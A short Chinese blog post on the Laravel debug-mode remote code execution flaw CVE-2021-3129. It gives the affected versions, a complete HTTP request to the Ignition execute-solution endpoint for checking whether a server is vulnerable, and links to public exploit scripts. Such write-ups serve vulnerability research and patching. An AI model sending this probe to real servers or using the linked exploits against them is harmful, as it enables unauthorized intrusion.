Laravel RCE CVE-2021-3129

发表于2023-03-11|更新于2023-03-11|漏洞利用

|字数总计:184|阅读时长:1分钟|阅读量:

漏洞概述

当Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。

影响版本

Laravel <= 8.4.2

漏洞验证

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null

返回 500 证明存在漏洞

利用脚本

https://github.com/keyuan15/CVE-2021-3129

参考

[CVE-2021-3129]Laravel Debug mode RCE复现 | tyskillのBlog

SNCKER/CVE-2021-3129: Laravel debug rce (github.com)

zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) (github.com)

文章作者: keyuan

文章链接: http://www.keyuan.org/posts/e112b35482b0.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 keyuan's Blog！

CVE 漏洞 Laravel

相关推荐

Joomla 未授权访问漏洞 CVE-2023-23752

WebLogic 远程代码执行 CVE-2023-21839

phpStudy Linux后台sql注入 CNVD-2023-19775

数据库加载中